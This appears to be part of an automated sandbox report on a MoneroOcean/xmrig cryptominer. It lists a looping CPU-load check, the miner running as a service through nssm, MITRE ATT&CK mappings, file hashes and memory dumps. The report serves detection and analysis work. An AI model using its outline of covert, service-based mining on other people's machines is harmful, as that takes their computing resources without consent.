- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:564
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:508

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4968
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57da3d424c30fd925904d3603284d836

SHA1
2acf62edd559e3abf5f0dd691ee84d00f1ea233c

SHA256
0a747a7328c3bf073c4cda9a9168490768df561b8bff80c3cc8a84c9eeded52e

SHA512
8d5e4a190922178fd4f25b4b4cbde89f2bd2b07aee5771db8541049631add6d3a283de784131aff681db0e3db773ad30f11f82db7b8c3edfe14ec81afde8265f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
10de29965131d51d70494b2ae8494cfa

SHA1
bc09d8526efac91fcc1e2362d64a2bc70e228767

SHA256
630bda3be94b9082816f053b5d015ee4dc631f7eba97a2610025fbaf3fb611f0

SHA512
cd1ac16c62a2391d9b0973a30130eb20ad1eccca5157e000b67bdc0453b7c453ce5ae7faa964c9ac20ea3ab38c85844d9e88c5518e188dcefcde2f21667b74e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a7b55daa6d85e47cade2aed7f7a09828

SHA1
62612e01d0585266a06bdf9b0a8eca05e78fd288

SHA256
5862db3e317e40e3b3ab818f97eb5cc062048a9f014c02ff5a4b4f79b3e7f993

SHA512
a1a32a38ae3b4a2497b8b0aa97a7781b455f96e601b94f3d436409a300f73b6f31e7c24b1dc986946004505e1e0e7bb3a9a494ff851c8099a418b782401aaaea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
89bf0c98e051836f9e2c8884034c43fa

SHA1
17def28a37a507dc97ab9d42db58378ca7d3c770

SHA256
3d93874c6d747a55f64c52449c05b69d04388b97392413a2575e53121ae0c62a

SHA512
10b4aac7221b310dfd29103664fccb280da5895c9971d105c93856c014306a0352005a7a23d618cf20455f986d28b84aa702a1bc393cf8bb1bd1e7a6c4a6fca8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b73ecdba212670cdcb6db19ebd175349

SHA1
609acbcd72ac5d4c803a26000dcb61d5b257012c

SHA256
70b98616324834f340c4ed52dd6f92fa38cff4c8958bfae8b1b5b39a07ca17f8

SHA512
3d15ad1bed69dd287450bfea54f3b2db844e0bf075b0d63deea062ac728d7fb2577ffe89e516f2f02a9302d70f208e8e04c69b3cf9e721dcce892e071d830250

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9eee5d47cb6faa1dcba5bfbb98fc520c

SHA1
370bf71b9a6212ce8912d99335a6476bc243246e

SHA256
601d9dac743813912991d219d62343535d29970f5955db7c8a7d51950ad13170

SHA512
8c3243db0523bf4161d90bbc480c2551a6cef1914dab50459b2eda2cc65550c49dd3f30116bdd8ba4b937dd4c7f128d9a5275be25a69b9e73ad070aa6768169e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e788cae45d7f1716fd66f2ae6770c7b7

SHA1
4c0a01f58598d91ac8d0c6988ecb9c77e5704594

SHA256
53838e3aca2d5c457c5d7b858278178b664db93dc0b6c5c3b1f3313c36dc5b47

SHA512
53f3757d17892e83e0106343c182ba72dfa4401a92812e0b303f2d61144090ed7ff1785d98d8e6628459293743479be5d28af21fcf5419e86ab5d326298fdbbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d80fac4857d355447882e48d8efc0851

SHA1
4a9df945e079549dfd387c3190e349e6221a67b9

SHA256
b7cd605112afb05e4fd9364626678dadc6e57b3007369773a77d3ecb53840d2f

SHA512
71219ebd70f15b6b79f13e02d6c2f0ca7b96a5bda8fdff956a996fd991590afabf50f51c2c5604cfc2019ce67908ee92c0e511d3015682595d89a7a5f3c30023

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
49d860d527ea1008da868313c7b5e6b4

SHA1
0092f0953e9dbf40ae3490977d64a2ce5d7eb9b4

SHA256
e1d52cb92646abdc20eb9e56b3e37cb1b78779ecabdd7ca9f800b59bfd5088a6

SHA512
c2123c5455705d9affc52c0b504e1cd68213988a495a0437a2a7fe6dc46fb3bdecd4fd4352c2619fd67bf2ac44926213171eaf3f90291a9e31e8e2a30a2fda7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee5506c6b70f894af888b0f185a67d4b

SHA1
47d677c55e80395e4c3ce0c3ec9853eb77338cb2

SHA256
5f76b2dcf3a0a2f20bc77490e0476f91d93473574825fc79735f7eaf5e8972ea

SHA512
9fb395a7f469faa5c6909a3d322a6b338f5ea217fcb104347b93d3c9733fcdb91bd03af25e920e917ec86bbb8f982ba8a10684b27ed7222cdf4441a1534551f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57dadbd61755c063840a1527ba1c4252

SHA1
9d5d233c94b56d3258d4825b2fb90d4fe31e2cab

SHA256
63f8f8e19e9202e58a54d076741f6fa9a9adfe239b09f312bce9353b0de8da7c

SHA512
0837ea398c2e228869803dd07983c7fb2071568706f0922a7ab407f68d3bc5eac19a406b25a0818e705c79c579143ec9d0c7e934435790d8f3943749ecf4da5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4078e417be411ca822e7c69a4f7fd1f9

SHA1
0a1ac8212a427315e786bdf0c8ce3eab77e9fb1a

SHA256
eaf14431d9e26aadd0f0f35d6dad39ee1841038ae276c572d08f2ad69ef4a2d4

SHA512
d4f2be115ff473d77e8f15d7a2b7e274f72708abee47defeba22eec92e97042a361460a3fae6f83d6a65aa2b35cd715711188520019d9e14a081056d65e059d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0g0mzdr.55q.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp72A0.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
3108c934afeab756b3e555d9e53c4a30

SHA1
afa902564484a4236324ea3a7a621d2de6a419a0

SHA256
a8d805619bbed79792d8893970de662940c2212a659f4e631743bad4d3bd929a

SHA512
6f364af3bf8e114072c3bd2b035ae5543d635eab7bdd0c93945babf59505b23f07a29611ce545938f544a0dbe47e942a953fac2d450ad8e66b9847fc98a9573c

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
ecd820c50f829ddf7abd9a1b165334e1

SHA1
9932851c609af69fdd31134b6c967a756e689ac6

SHA256
9021ca419f2d17d10ccc28de02a3d18a0f2fa1c6dacd04aff4fd49704e7463ea

SHA512
ee241cc20bd3ad1c7ec757fbcaec4680a244992ef1607b1f115c0891c04af56c46bddc80e64304f09ba1a1cecb14fa27543056f6b7ffd6b1344009b079a89636

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
f18c84fbd152de51258afc8dae1a1980

SHA1
13bf97b78e89bf004359c38862f11591dd214808

SHA256
a3256d47b3e16b7856b3048f2158aa091cf4a9d7f627e616d61b662d9282a132

SHA512
4ede48df4fa13219f53245f744d66cb45878ea63373256a15ab4abfcba70befdd3f8f509241b078ae4357d8c38381bed01a18a19e46a2b8fb995755097513094

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/292-26-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/292-10-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/292-9-0x00000258FD780000-0x00000258FD7F6000-memory.dmp

Filesize
472KB

Download
memory/292-7-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/292-5-0x00000258FD5B0000-0x00000258FD5D2000-memory.dmp

Filesize
136KB

Download
memory/292-4-0x00007FFB1C1D3000-0x00007FFB1C1D4000-memory.dmp

Filesize
4KB

Download
memory/292-424-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/508-90-0x00000238999B0000-0x00000238999BA000-memory.dmp

Filesize
40KB

Download
memory/508-91-0x00000238999E0000-0x00000238999F2000-memory.dmp

Filesize
72KB

Download
memory/2532-135-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2532-134-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/4948-437-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-457-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-435-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-436-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-438-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-439-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-440-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-441-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-442-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-443-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-444-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-445-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-446-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-447-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-448-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-449-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-450-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-451-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-452-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-454-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-455-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-456-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-459-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-460-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-461-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-462-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-463-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-464-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-465-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-466-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4948-467-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
